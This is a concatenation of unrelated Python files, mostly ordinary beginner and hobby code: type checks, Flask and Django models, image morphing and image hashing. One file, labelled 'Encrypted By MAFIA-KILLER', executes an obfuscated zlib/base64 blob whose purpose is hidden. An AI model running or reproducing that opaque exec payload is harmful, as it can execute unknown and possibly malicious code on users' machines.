p('type(123) == type("abc") ?', type(123) == type('abc')) # Warning 建议使用isinstance()替代==比较类型
p('type(dog) == type(animal)?', type(oop2_extends.dog) == type(oop2_extends.animal))
p('isinstance(dog,Animal)?', isinstance(oop2_extends.dog, oop2_extends.Animal))
p('is p(*args, **kw) be a function ?', type(p) == types.FunctionType)
p(type(lambda x: x) == types.LambdaType) # True
p('LambdaType', isinstance(lambda x: x, types.LambdaType)) # True 验证 type.LambdaType 是Class类型
p('GeneratorType', isinstance((x for x in range(10)), types.GeneratorType)) # True
p(type((x for x in range(10))) == types.GeneratorType) # True
p('haha is a Husky?', isinstance(oop2_extends.haha, oop2_extends.Husky))
p('haha is Dog?', isinstance(oop2_extends.haha, oop2_extends.Dog))
p('haha is Animal?', isinstance(oop2_extends.haha, oop2_extends.Animal))
p('dogs are Husky?', isinstance(oop2_extends.dog, oop2_extends.Husky))
p('haha is Dog or Cat?', isinstance(oop2_extends.haha, (oop2_extends.Dog, oop2_extends.Cat)))
# --------------------------dir()--------------------------
class TestObject(object):
def __init__(self):
self.x = 9
def power(self):
return self.x * self.x
def read(self):
p('TestObject read')
def read_something(fp):
if hasattr(fp, 'read'):
return fp.read()
return None
obj = TestObject()
obj2 = TestObject()
p(dir(oop2_extends.cat)) # 获得一个对象的所有属性和方法
p('obj(TestObject) has attr "x" ?', hasattr(obj, 'x')) # 判断对象obj中是否有x属性(变量或方法)
p('obj.x =', obj.x)
p('obj(TestObject) has attr "y" ?', hasattr(obj, 'y'))
obj.y = 12 # 为obj对象(而非TestObject类)添加y变量
p('add attr "y" into obj')
p('obj(TestObject) has attr "y" ?', hasattr(obj, 'y')) # obj有y变量
p('obj2(TestObject) has attr "y" ?', hasattr(obj2, 'y')) # obj2 没有y变量
p('obj.y =', obj.y)
p('obj2.y =', getattr(obj2, 'y', None)) # 从obj2中取y(无),若无此属性则默认返回None
fn = getattr(obj, 'power')
p(type(fn)) # <class 'method'> 与types.FunctionType不同?
if type(fn) == types.FunctionType:
p(fn())
else:
p('type(fn) != types.FunctionType')
read_something(obj) # 有read方法的对象
read_something(oop2_extends.haha) # 无read方法的对象
|
from werkzeug.exceptions import BadRequest
from flask import jsonify
def handle_invalid_usage(error):
return jsonify(error.to_dict()), error.status_code
class ValidationError(BadRequest):
"""
When invalid data is sent to via POST or PUT, this exception gets raised
:param message: The error message
:param field: The name of the field that raised the exception, if applicable
:param status_code: allows overwriting of the default bad request status code, 400
"""
status_code = 400
def __init__(self, message, field=None, status_code=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.field = field
def to_dict(self):
"""
Returns a REST-friendly API response
"""
return {self.field: self.message}
class ConfigException(Exception):
"""
This exception gets raised if the config file is invalid
"""
pass
|
#Encrypted By MAFIA-KILLER
#WHATSAPP : +92132197796/DON,T TRY TO EDIT THIS TOOL/
import zlib, base64
exec(zlib.decompress(base64.b64decode("eJztXVtv20iWfk6A/IdqBQmpWKKoq29RFrIjd4y2JW+sJNNtu2lKKlmMeFGTVGxndxtudNDTwF5mM2gkWGAWs+jHfdjHfVsMsD/Fj/sy8xO2isUiixQtyxJlOZ6cODZZrDrn1KlzvjokS6X74IVly+37QNH6hmkDw0pZp1bKVjSYass2dA5MWW8bWqorW11VaaZMmLK7JpTbin6Uem0ZempgqvhCyzB6CsRHR9Duy5Z17+79loGrlQd2J710765hCYi9DTWeMzWQNjtAsE9sLnnvbscwgQ4UHSBhR5AvioiSK/fu3rsLEOla0wRlQBQR8B9Ft/ksoRRYJpQklclvJEew7LYxsFFDow91nnNkpQAnY4GkVt/EjDB7r8hvKHTUgdXlPba2ebpCjl1rmfC7AbRs1E940oJ9G2w65VXTNEy3JtPjvtLPoR4ie6sq0GCrK+vKW8hdzN6rMwF/VzXKHY+jYKkQ9vlscqhlowt1YJ/24Qron9pdQ8+BpmFZxEzxegY1WYrpXMc0NKANVFvpm0YLWhZqLvQNQ6WGaDhMd1CJW5lyEYhdFEO3aN11Q9dhCxc5ZqLcqTRabc00ji1o4g7eu2tC1ZDbPOof6rEz/tBuw46MVII68WCeQy68hC3ieKLHT3AZ8c4V3FBCF9oqlEyjadgWvyGrFhy+CDsmRL7l85G6tt0XnjUaO8/JtR1iCwOxTmnyiYQNXs4STnK73UUWgaaFdNnjuRdIg3TlCOqOf9f70JQzy8KSCPiK3jYNpb0KnEKwrehKJp8TRCGXKxYyS0UBvFgFSjsJdpBM28jkhGxOKOTy4CVijoyYQafZEpc8iJQ7wHJlIpd7KqtvlF4mK5QEJHhL0Qcnq5i7qwIoCAUhtwpqvykWwdpAUduZr+qNYlEsJcHexlqlltlYK1RW0dHLTFZEPLCSJaG0hIrWXmYKxWWxkC2J6Ozpdubv2lC3FPu0nBfE1LHStrvlrLgkprpQOera5exyTvwHVHNrPaPY0mYDHT4PsFh/ntkxkPNvG01FhahgeyMjWwMLy3pKj3ZqmRaCm47cgk3kwEJPtmVdxgq8zFR2X+xK34hi5Sk6332ZKQqYbX0nk8XcK5mTpdKKbGpQbirpN4vy6oFjwnt3kVuBHlQHMhpWFMJ3HAACKAJlvWcJHCohcYk8W7H5JG0it+Qe30y6QX+MrM/JXbv99nWLI0VtXOQeYyxVMJaeuPVJhQVU4wtu4XgvBKNiSkXoeJxMZ5MHCwppYUJ7YOqgBW0kt50kYYIVISWjNPGkHzPSX6N6x4Kit+EJryT98pMyOBFM2FeRjXnuiwcW90BJcftiPr/3wFrNatwDyzb5fHbhddJtdeL0w6khahwtC7IRuZRXIzmE6semYkP+ZIHb1zmmZ69lVdb5t86o4D5A3Ie3YAHgerjwzhAPHNeBYm/CuHOHQVw8l4kCDl0sx1Z6ZOhtBR3iOOIEpCBSWRDcPwLgDlwtDKyFU9NRgcxXiX1z/yTb3MuuLue1HRXKFgSvZMUGtDSrJRaMZGp1WLXV0EyAwlpuYS1ENDv3nLBGopW2e9DqN92jNwNVN/BcmnAsm89qNXT6EpUmyEX/Uk5zi9kJP9FCepoJJJK4PEgkUA2ngaPw+cffzeXH1yE3Rx18LfI3wBKFuVrikfR///Zf5z/+ev7h3fmHn84//Pb8w89//tP/4JI//On8h39GB3/542//E5//8E+46Mdf0eU4aozB4MPPjkI/YeV+/BUpKj1iRw/5Ma5x5uiOfv8M6HnwBB29d47eByoE3ACXu5W8tu+cnyCjM3ISqBDwapcF+XFbDJ0AqkSwAtu5RU+nn8P6v484OvOUGupdyTdTuAOjOZHunfmcil73zsI9GH1E1D+7BQ43d7j4DJw3AzidGRXdcyPaMo4M/Befq+g4i2fnzxMua63PfkMt8Ynj3+cJ9/OE+3nCvW4d/tph8/zjv8zx51OPIVCrbFd9dwYblef1+t+CSm238nzTfzxEHowz9V49qzR2K5Ud4AMbAAvLuWw+l11eXFwuBWd2UKs3qoG6L3arSNhuAxS+BLub26BWbbBNCk6TQIudrW/A03ot1QDrla0tsF0F9drW16BR/U0DbO9+ybYuamB3q/5lpRZgsFYFz6pbOxsvtkCjDuovGs+qz3dDzYb0rNWRatWn4OVODfDg1WbjGWoIEPPNWvLThND5haqT+OIsOEez4E/Pemzw/O9/jPMPpAQ2dMZpID0BhwI55FbZOBrVKH3IMafkBHCHnCCxYRXdNpVOgnQ6LUjO6d87vwVUwHGH6SSrf3GIAVKRFYvUBvvo/yr6n3GKJL8COEyxqVBA+zQHJEQB1vukD4wQ4FQBh+kUm515DaQnzp8M6gqqI4wwl5DmUAeJgH1JGuYGuHQK/ebZjh0KqcPvwf73HGKf4nylklT8/nD3gPSY7Q05cpoCLklaIr7EVkR59+/joN2RiTjXnj4vXwXe5+BqyzLzL7CGQyCLjOTydduxo4kLhgxHqoBDT4M0F/RQEGIheZ6QSqUCTuedMaY5JCMnBWabTNqv6khfJSMEJM8QGXTsKQtWPQtglvxhej8YtyxH2oQa0kgypcGz1QhHOuRYp85qqe/THDHLUN+4cFPm2B//fab0ccAOGcftQkz2g+fR/4J+wKg0PHqoOwFbO2OSuZDxPorbQybQnAF8HEYckJGGFXG9gvdiHkhJVr2orgUQxAcjx2VWHY0xegFhZUVARUi3FUGgiMZWpgIjApZeGjIZOFxZAalvBcRzhUMOdxjCF7AfsCYDSxxFc8c1Mkg+Ug2pRw4uGEGsZhQ359oTifEY3HF+P8OjgEjuZ5Kso7J9fXxhXxkI8DD8MP3tt9+mucxQQDv4xTILzwkYZBjnEZi49ByK2OPxITd6bkIQGeYtSEIqJQnDKg25chQ7QQqXoPjlhr2NdeFRczZ4wvTL7+bFvcxqOAP76fzjP87rt/eEct0wTdiy8ZoFXdYgzsn6cs+/sCNb1rFhtv0LOHsz+vhVs20OIOrVcVdRIeBJKS2m76QHPmNTPpYUvT/Ar0w9h6YvSUva2vNK7Sm5FfFep55/+G96sqgl3LfHSgfwPtsyCHWBSr7T91WPFO29oC26sncqu7uv6s+fgksUoEr4AjwlqLmSK8H7JvKaNbFlHB3BNn6LbA1aeEFJZ6Cqp0C2QAIs+La6/xS+WdmubGxW0l9tbm1Vn9+7eye0cCiXDAqgY9LBK1w4/xpEp9G6+CH3yjT0I0BVTwRrMyuTTtpHabx4C+DVMdZKJsMsx2gZ3tv9kMgLxNHhYsRdXRS5JcXP1u+Drc31ag3dUN4nj9rvl8N0n7zyVxULL1fhk8OLtpy34pQ3ukdRdLx8APNzTu5TchmRCpewId13HvuzBQkfCx7N7nbrUWJoxZkoiMVkpCbkQdYvP0T/EJaTXr2KHovaXvbJkycHNPAK2vpWvbZZ+zJ4580DJjms1V8lE3S14SgpnM91T3Sk+I9BqieKjXLoNbnVS3JMI+46LEQFKqrSlTzfI54WKHT9rQ/lXgjZdD/G1p/V67vVFeBPhQx6kqblRCIiSj2w21BUFWzqFNjUUyZQQ0qSoGcYZ1nO30DY493lNuR47IjJsYMQh3GDLlByHQ0g7Ospli3rXIQDZcWLHegA4AU7XLxqjnJi2VlMyS5FI+cXOQXnO0WeOoVfwA35BMcN+QS398UBGPIGZorxdYpyBBCgKLD3FyMFBTMeEGw6FJQffh96z/Q+dP57+krlXfilEdvSrXzmXfdeVUUwe+dcwMfcRZrlNabyu1DjwDl5Y/be19R7w3RGL74DnkDv5VA0M//3hZoVNJZTQDI5iDh/R4SFxL7zDB6hWQQz0quLNUMwjB/RVnZ2vgZfVas7YHd7c6saru5PFnmtqtvQBLJ+6kWxAshKUtAy2hDUBloTmglnheGQb/uNnbpZNz4//s42vMPCMmAa+gvDKbUuSjBJvIEVkAgla71yQsyH8iyljRITvKTPXRofaoKXH6qK7qyDdBbQk/qpBAocAS/IxhctPpx3Es6C3EdN2jyuI1i2qfT5JMOfrmevs2vZg4biEy4KIHsaNtgwBno73KvAVLTnTKPgIFypqaJiTe4o8kkUYnAiC0ChGSYirbwiOJFGRfER4PxhStOFqyd46Spe4qo69qUmctaiomHZO//DLwf+zTNoGLasek6HzGytAG4BcQm3+8sff/nXA+B7uHdPhSmyBSupSCUhAUB3nPkCOWyrnLaOHfrUGIBW1zCQ6VCbVrBFYu/83z8e+JHkrFqtgFfO/dyuLeMF/CYaLvwJAEFIhBujbr078BGlYaA26CbEXSrvrGG3wLptqgtvExfbP+vZH89nmowGXDaPWD8+Uo0m6n6r30wZPcsvx7dLaMBQ7VHRieYZrddWTJ6z5DeQG3Z7FKJRbu98YuZitvg6XsczcD63wF5py7aMLjRNgXzQhd7BNNNyXwncxWQ0aHeNdkYe2F3B8fW/kZ27Qsk2elAv5/KLi8XlZXG5uJwtFYsPcsVccXFd7GQLoiw3YbvTLBXlVm5RXswvw3ZWzuVK+Wb2IYIKTbbL+CMfD612T3pDPjxQzj6EyLxqmQMLvYXWAtZ8AXAPVaMlq7AMdenF7kN6S4sruX3EdRCbsmJYD4+gDk3ZhpKFPxhi6BL5LImFeFvKUTnfKRaLneUlpFi202ovyrLYKhQ6xaVOMZeDHS0Mat8hO2E1BecTH9hwoQoIGDjWJByGv+8iMC6Um+U1vo7vHmvGcRKFGOpDD/1vuffYuEsAATvwOzkeDcs1ek3vE03YvzLMfX3gE04RDd11695YOJrQhfBR9VsqimM+8qJFIZ7lFaoZ8SgAE7bx8fFx8P7asfMeB3FkSJp1xB1EtMREDe+BFV/pIOQAi2351EqOYfpotq2+FbRrqwtbvb6BhI00q9v2SqalbS40L6nQHMPEI8zsGAs1wa89WYtE17xdIJKbJYhQuhRMKI0NKt6wXRFcQi6eu5jzxPDBMIjy9dwoX6ftRvo7qRQFK+Enj5RG+D2m6WCG0rRwM2IsME0DOwyPiYaEtr10WEjFKDi6aGgwXTI8mDCLfBk/5ncy2mwufI8SptuFUvnrQClKY6MVpSujljeqk6VGrk0u5z81hjGMogInP07g0PZjBQ+pHIVt+UtajhFEmOLBOkrTYl4+Im+NojjAj+E11VhSHmOPJ2kQBYqXjSmmMccVE2ZZKCcWl0qiKF6Cj5RuF04WrhMnKV0ZLylNjJuUpru1LIwZfJhiQ1KGYVQUFq4ShZTPlSKRNIpC2MKYHK4QkZjiRVxK0yJv4Wri4gRghmcsLkB5XdkNSMMoYB7XFTBd0R0wYRHFcgJlsYViaUygpnS7ALs4D8CmNDFwU5oawClNB+TFqwuMHc8ZxlFBXZwkqCm/iQKbNI7C+eIVOU0Q4Jhmg/uUpsX/4hUmf5ZmMREwvGP1HcpzYv8hDKImiKv6ECbHjyZR4VppQndENin5z2fQLcgVpzVKt2t6K81zeqM09TRHKbbpjtJ0015pcsEzm/4YAVFQVpoGyijfqeCMMImaFkvJSfldB03W2xsKuZMP3WyTCkrTJhdTRCamWeYYjIyZBCjlPXWQEkZRucfcA3XyTt3QeGRpyshB47MYeE9VKE6YCVG6XRnR4k3IiCjFlhlRij1DojRdprQ4vQIzz5gYQVHAvBgHMFP+sYAzYRaVSS3OG6BH0nS9vqEIPv1QXk9mRWnaDCuGiMZ0HZkWI2umgU1lxBbchGFUBjb3AJ++czc0jlmKKdLQeC25GZmbkE36bCpMtyszW7pJmRml2DM0SjPL1ChNl7EtxafItWVujMAooF+KE+ipnFjBnjCNyuiW5g34Iyme3t/QGSG+ob3eDI9SZKYH7bEzvRiRANN1ZnyMzGsBBCordlAgjKMywbkDQ3ydvKHxz1LMkYnGb9lZLjn568qL6Halhss3MTWkNLMUkdLMU0VKwylj4KHA5XPFcvw6XXv2yAiOmjSWZzFpUHkzmTgI86iscnnek8dIitcKN3R2iX+o55NlUpr2ueIMEATTPLJORva1AgmVOTMwIQKistG5A0r8nb2huMHSjCIZf4ZbLCdEUYw/PaV0u9LUrHiT81RKM89XKV1b3kppyp0uxNlpNrcsllEgcuMHcZazEBU805mICInc5EOc93Q0kmZjjhs6X81u7Oeb71Kaeq+XGYIPpnkmwIwO88EgKnzmOEQERe6GM3csmm2vJ6QbqdTEdNt6g//NW4s46Xb1htLt6hXxOr9PZCfCkTsQkiO8xXuji7f73DEMlc97WxMLmtzn8eaJKaC0x9ls0Z3L6WaNz2QLrEGI99DU+iq0YRsIghCsS3ahrOt4F9FMvdNxtiPF20rSLTNRhppMLnAZvwTNE0lWG55bVw0dMa+0WsZAtxnBu2jCbiN2ZOJ2arH7oJIvhE/UDBvL/NoYmICqIBNe4BXeBtS5GZI7eFdXdKdqGyAnApyeBHeg5AI9c74IwbHx+S9nMfy4W+X6W/OS41jYu8yif+KRMELIWVwmipATJ++goT4z/sz4U2PMbK8df3iHg++vlXHAuhSEyD9/n+dGV9Z7Fp5KZFVlv/Boo+kfB7+sxS9fq4IK2KnvbjY2X1bdrwT3p/PIL2/IaXv+Id5E2+fm7abtbowdSIvu3VU6QJLwd6pIkvNFPJKEMwJJoltqM98q8f9Dxbjs"))) |
from rest_framework import serializers
from .models import User, Chat, Message
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = '__all__'
class ChatSerializer(serializers.ModelSerializer):
users = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=True)
class Meta:
model = Chat
fields = '__all__'
class ChatShowSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, source='users')
class Meta:
model = Chat
fields = ['user']
class MessageSerializer(serializers.ModelSerializer):
chat = serializers.PrimaryKeyRelatedField(queryset=Chat.objects.all(), many=False)
author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False)
class Meta:
model = Message
fields = '__all__'
class MessageShowSerializer(serializers.ModelSerializer):
chat = serializers.PrimaryKeyRelatedField(queryset=Chat.objects.all(), many=False)
class Meta:
model = Message
fields = ['chat']
|
from ariadne import gql
type_defs = gql("""
input CozmoSpeakInput {
id: ID!
sentence: String!
}
input RandomAnimationInput {
id: ID!
}
type Query {
cozmoSpeak(input: CozmoSpeakInput): String,
random_animation(input:RandomAnimationInput): [String]
}
""")
|
TEST = False #WARNING: Seeing to False will use LIVE DATA that can incur a cost! Please only set to False when live data tests are needed! For testing data, edit the values in sampleresponse.json instead!
TESTRESPONSE = "yWait/sampleresponse.json"
from django.db import models
from django.contrib.auth.models import User
from datetime import datetime
from django.db.models.signals import pre_delete, pre_save
from django.dispatch import receiver
import json, os, requests
#Data object
class pureData():
def __init__(self):
self.data = {
'epoch':0,
'hour': [[],[],[],[],[],[],[]],
'closed':[True,False,False,False,False,False,True],
'address':['','','','','','',''],
'name':['','','','','','','']
}
#Actual data from API regarding location traffic.
class trafficData(models.Model):
jsonData = models.TextField(default = '')
def jsonToData(self):
output = json.loads(self.jsonData)
return output
def __str__(self):
return str(self.pk) + ' trafficData'
#A location object
class Location(models.Model):
#Name of venue passed to API (also user friendly name)
venueName = models.CharField(max_length=256, unique=True)
#Address of venue passed to API
venueAddress = models.TextField()
author = models.ForeignKey(User, on_delete=models.CASCADE)
#Traffic data for this venue
data = models.ForeignKey(trafficData, on_delete = models.SET_NULL, null=True, blank=True)
def updateData(self):
outData = pureData()
if TEST == False:
#call API and gather data
apiKey = os.environ['APIKEY']
url = "https://besttime.app/api/v1/forecasts"
params = {
'api_key_private' : apiKey,
'venue_name': self.venueName,
'venue_address' : self.venueAddress
}
responseData = requests.request("POST",url, params=params).text
unParsed = json.loads(responseData)
#To ensure API usage is consistent with expectations, address will be pulled from API
self.venueAddress = unParsed["venue_info"]["venue_address"]
else:
#TEST RESPONSE#
responseData = ""
with open(TESTRESPONSE, "r") as f:
responseData = f.read()
#parse API data for needed information
unParsed = json.loads(responseData)
outData.data['epoch'] = int(unParsed["epoch_analysis"])
for i in range(7): #API response is broken down as a list of days.
outData.data['address'][i] = self.venueAddress
outData.data['name'][i] = self.venueName
if unParsed['analysis'][i]['day_info']['venue_open'] == 'Closed':
outData.data['closed'][i] = True
else:
outData.data['hour'][i] = unParsed['analysis'][i]['quiet_hours']
outData.data['closed'][i] = False
#Delete old data, if it exists
if self.data is not None:
trafficData.objects.get(pk=self.data.pk).delete()
#create trafficData using parsed information and assign it to the object.
trafData = trafficData(jsonData = json.dumps(outData.data))
trafData.save()
self.data = trafData
def __str__(self):
return self.venueName
#Set of locations to be compared.
class ComparisonSet(models.Model):
name = models.CharField(max_length=200, unique=True)
author = models.ForeignKey(User, on_delete=models.CASCADE)
#Traffic data for this comaprison set
data = models.ForeignKey(trafficData, on_delete= models.SET_NULL, null=True, blank=True)
#Comparisons for the Location objects
locations = models.ManyToManyField(Location, related_name='compLocations')
def updateData(self):
outData = pureData()
for i in range(7):
smallestCount = 0
smallestLocData = None
for locale in self.locations.all():
locData = locale.data.jsonToData()
if len(locData['hour'][i]) >= smallestCount and not locData['closed'][i] :
smallestCount = len(locData['hour'][i])
smallestLocData = locData
if smallestLocData is None:
outData.data['hour'][i] = []
outData.data['closed'][i] = True
outData.data['address'][i] = '-'
outData.data['name'][i] = '-'
else:
outData.data['hour'][i] = smallestLocData['hour'][i]
outData.data['closed'][i] = smallestLocData['closed'][i]
outData.data['address'][i] = smallestLocData['address'][i]
outData.data['name'][i] = smallestLocData['name'][i]
outData.data['epoch'] = datetime.now().timestamp()
#Data old data, if it exists
if self.data is not None:
trafficData.objects.get(pk=self.data.pk).delete()
#Create trafficData using information found
trafData = trafficData(jsonData = json.dumps(outData.data))
trafData.save()
self.data = trafData
self.save()
def __str__(self):
return self.name
@receiver(pre_delete,sender=Location, dispatch_uid="delete data Location")
@receiver(pre_delete,sender=ComparisonSet, dispatch_uid="delete data ComparisonSet")
def deleteDataSignal(sender,instance,using,**kwargs):
data = trafficData.objects.get(pk=instance.data.pk)
data.delete()
@receiver(pre_save, sender=Location, dispatch_uid="save data Location")
def updateDataSignal(sender, instance, using, **kwargs):
instance.updateData()
|
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1+n2) / 2
if m >= 6.0:
print('Passou')
else:
print('Reprovou')
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
import copy
import argparse
from scipy.spatial import Delaunay
parser=argparse.ArgumentParser(description='Image Morphing')
parser.add_argument('--source', dest='source_image', help="Enter Source Image Path", required=True, type=str)
parser.add_argument('--dest', dest='destination_image', help="Enter Dest Image Path", required=True, type=str)
parser.add_argument('--k', dest='k', help="Enter no. of Intermediate Images", default=10, type=int)
parser.add_argument('--output', dest='output_image_path', help="Enter Output Image Path", required=True, type=str)
args=parser.parse_args()
src_img=cv2.imread(args.source_image, cv2.IMREAD_COLOR)
dest_img=cv2.imread(args.destination_image, cv2.IMREAD_COLOR)
src_height, src_width, src_depth=src_img.shape
dest_height, dest_width, dest_depth=dest_img.shape
if(src_depth!=dest_depth):
print("Errot: Incorrect Color Channels")
exit(0)
depth=src_depth
src_window_name="get_source_features"
dest_window_name="get_dest_features"
morphing_window="morphing"
src_points=[]
dest_points=[]
# BGR Color Channel
def src_getPoints(event, x, y, flags, param):
global src_points,src_img
if event == cv2.EVENT_LBUTTONDBLCLK:
print(x,y)
src_points.append((y,x))
cv2.circle(src_img,(x,y),2,(0,0,255),2)
cv2.imshow(src_window_name, src_img)
def dest_getPoints(event, x, y, flags, param):
global dest_points,dest_img
if event == cv2.EVENT_LBUTTONDBLCLK:
print(x,y)
dest_points.append((y,x))
cv2.circle(dest_img,(x,y),2,(0,0,255),2)
cv2.imshow(dest_window_name, dest_img)
def get_features():
global src_points,src_img,dest_points,dest_img
cv2.namedWindow(src_window_name)
cv2.setMouseCallback(src_window_name,src_getPoints)
cv2.namedWindow(dest_window_name)
cv2.setMouseCallback(dest_window_name,dest_getPoints)
cv2.imshow(src_window_name, src_img)
cv2.imshow(dest_window_name, dest_img)
while (1):
k=cv2.waitKey(20) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
final_size=min(len(src_img),len(dest_img))
src_points=src_points[0:final_size]
dest_points=dest_points[0:final_size]
src_points.append((0,0))
src_points.append((0,src_width))
src_points.append((src_height,0))
src_points.append((src_height,src_width))
dest_points.append((0,0))
dest_points.append((0,dest_width))
dest_points.append((dest_height,0))
dest_points.append((dest_height,dest_width))
def getPos(points,baricentric_coord,triangle_indices):
accu=np.zeros([2])
points=np.array(points)
for i in range(3):
accu+=baricentric_coord[i]*points[triangle_indices[i]]
return accu
def interpolate(pos,img,h,w):
(inter_h,inter_w)=pos
index_h=int(inter_h)
index_w=int(inter_w)
if(index_h>=h-1 or index_w>=w-1):
return img[index_h,index_w,:]
topleft = img[index_h, index_w, :].astype(np.float)
topright = img[index_h, index_w + 1, :].astype(np.float)
bottomleft = img[index_h + 1, index_w, :].astype(np.float)
bottomright = img[index_h + 1, index_w + 1, :].astype(np.float)
interpolate_1 = topright * (inter_w - index_w) + topleft * (index_w + 1 - inter_w)
interpolate_2 = bottomright * (inter_w - index_w) + bottomleft * (index_w + 1 - inter_w)
final_interpolate = interpolate_2 * (inter_h - index_h) + interpolate_1 * (index_h + 1 - inter_h)
final_interpolate = final_interpolate.astype(np.uint8)
return final_interpolate
get_features()
src_img=cv2.imread(args.source_image, cv2.IMREAD_COLOR)
dest_img=cv2.imread(args.destination_image, cv2.IMREAD_COLOR)
# cv2.namedWindow(morphing_window)
cv2.imwrite(args.output_image_path+str(0)+".jpg",src_img)
cv2.imwrite(args.output_image_path+str(args.k+1)+".jpg",dest_img)
for i in range(args.k):
print(i+1)
rig_wt=(i+1)/float(args.k+1)
lef_wt=1.0-rig_wt
new_width=int(lef_wt*src_width+rig_wt*dest_width)
new_height=int(lef_wt*src_height+rig_wt*dest_height)
interim_image=np.zeros([new_height,new_width,depth])
interim_points=[]
total_feature_points=len(src_points)
for ii in range(total_feature_points):
interim_r=int(src_points[ii][0]*lef_wt+dest_points[ii][0]*rig_wt)
interim_c=int(src_points[ii][1]*lef_wt+dest_points[ii][1]*rig_wt)
interim_points.append((interim_r,interim_c))
triangulation=Delaunay(interim_points)
triangulation_indices=triangulation.simplices
# interim_points=np.array(interim_points)
# plt.triplot(interim_points[:,0], interim_points[:,1], triangulation.simplices.copy())
# plt.plot(interim_points[:,0], interim_points[:,1], 'o')
# plt.show()
all_points=[]
for h in range(new_height):
for w in range(new_width):
all_points.append((h,w))
all_points=np.array(all_points)
point_index=triangulation.find_simplex(all_points)
X=triangulation.transform[point_index,:2]
Y=all_points - triangulation.transform[point_index,2]
baricentric_coord=np.einsum('ijk,ik->ij', X, Y)
baricentric_coord=np.c_[baricentric_coord, 1 - baricentric_coord.sum(axis=1)]
counter=0
for h in range(new_height):
for w in range(new_width):
src_pos=getPos(src_points,baricentric_coord[counter],triangulation_indices[point_index[counter]])
dest_pos=getPos(dest_points,baricentric_coord[counter],triangulation_indices[point_index[counter]])
counter+=1
pixel_val=lef_wt*interpolate(src_pos,src_img,src_height,src_width)+rig_wt*interpolate(dest_pos,dest_img,dest_height,dest_width)
interim_image[h,w,:]=pixel_val
# cv2.imshow(morphing_window,interim_image)
print(args.output_image_path+str(i+1)+".jpg")
cv2.imwrite(args.output_image_path+str(i+1)+".jpg",interim_image)
# while (1):
# k=cv2.waitKey(20) & 0xFF
# if k == 27:
# break
cv2.destroyAllWindows()
filenames = ["boy0.jpg", "boy1.jpg", "boy2.jpg", "boy3.jpg", "boy4.jpg", "boy5.jpg", "boy6.jpg"]
images = []
for filename in filenames:
images.append(imageio.imread(filename))
imageio.mimsave("final.gif", images)
# cv2.imwrite(args.output_image_path, final_img)
|
import cv2
import os
def calc_image_hash(filename):
image = cv2.imread(filename)
resized = cv2.resize(image, (8, 8), interpolation=cv2.INTER_AREA)
gray_image = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY)
avg = gray_image.mean()
ret, threshold_image = cv2.threshold(gray_image, avg, 255, 0)
_hash = ""
for x in range(8):
for y in range(8):
val = threshold_image[x, y]
if val == 255:
_hash = _hash + "1"
else:
_hash = _hash + "0"
return _hash
def compare_hash(hash_1pic, hash_2pic):
i = 0
count = 0
while i < len(hash_1pic):
if hash_1pic[i] != hash_2pic[i]:
count = count + 1
i = i + 1
percent = round((1 - count / len(hash_1pic)) * 100)
return percent
def compare_picture(original, test):
temp_origin = "origin.png"
with open(temp_origin, 'wb') as original_file:
original_file.write(original)
temp_test = "test.png"
with open(temp_test, 'wb') as test_file:
test_file.write(test)
hash1 = calc_image_hash(temp_test)
hash2 = calc_image_hash(temp_origin)
os.remove(temp_test)
os.remove(temp_origin)
percent = compare_hash(hash1, hash2)
mark = (percent // 20) + 1
return mark
|
class Classroom:
def __init__(self, class_id, name, room, owner_id):
self.class_id = class_id
self.name = name
self.room = room
self.owner_id = owner_id
def from_json(json):
return Classroom(json['id'], json['name'], json['room'], json['ownerId'])
|
from PIL import ImageGrab, Image
from utils import start_timeout, timeout, image_in_another
from json import load
import dhash
class TaskIdentifier:
with open("tasks.json") as tkjson:
tasks = load(tkjson)
@staticmethod
def dhash(img: Image) -> int:
return int(dhash.format_hex(*dhash.dhash_row_col(img)), 16)
@staticmethod
def image_in_another(another: Image, image: Image, pos: list) -> bool:
if type(image) is str:
image = Image.open(image)
if type(another) is str:
another = Image.open(another)
width = image.width
height = image.height
start_x, start_y = pos
image_dhash = TaskIdentifier.dhash(image)
another_dhash = TaskIdentifier.dhash(another.crop((start_x, start_y, start_x + width, start_y + height)))
return dhash.get_num_bits_different(image_dhash, another_dhash) < 20
@staticmethod
def identify_task():
start = start_timeout()
while timeout(start) < 2.5:
image = ImageGrab.grab()
for task in TaskIdentifier.tasks:
name = task["name"]
pos = task["pos"]
if image_in_another(image, task["path"], pos):
#print(f"[I] Identified task: {name}")
return name
if __name__ == '__main__':
from pynput.keyboard import Listener, Key
from os import system
def on_press(key):
try:
if (hasattr(key, "char") and key.char == 'p') or key.value == Key.space.value:
task_id = TaskIdentifier.identify_task()
if task_id:
print(f"[I] Identified task: {task_id}")
system("python tasks/" + ''.join([x.capitalize() for x in task_id.split('-')]) + ".py")
except:
pass
with Listener(on_press=on_press) as j:
j.join()
|
import demo
if __name__ == '__main__':
#min_learning_rate = 0.0001
demo.run(0.0001)
for i in range(55, 100):
demo.run(float(i)/1000000)
#new_err = (demo.run(0.0001)
#if (float(new_err) < float(min_err)):
#min_err = new_err
#min_learning_rate = i
#print(min_err)
#print(min_learning_rate)
"""finding the min here is difficult due to float limitations.
Python Decimals may be too slow."""
|
#!/usr/bin/env python
import mcclear as mc
import datetime as dt
if __name__=="__main__":
date = dt.datetime(2011, 12, 31, 23, 45, 0)
m = mc.McClear('mcclear-dhhl6-2010-2011.csv')
print(m.data)
irr = m.get_irradiance(date)
print(irr)
|
import tkinter as tk
from math import *
from heapq import heappush, heappop
import random
import time
class Para:
def __init__(self, dct={}):
self.__dict__.update(dct)
g = Para()
g.size=700
g.sigma = 1
g.eat_efficiency = .5
g.dt = .5
c = tk.Canvas(width=g.size, height=g.size, highlightthickness=0)
c.pack()
def pos_to_pix(x,y):
r = hypot(x,y)
if r == 0:
return g.size/2, g.size/2
ratio = g.size/2*(1-exp(-r/g.sigma))/r
return g.size/2+x*ratio, g.size/2-y*ratio
def light_at(x,y):
return exp(-(x*x+y*y)/g.sigma**2)
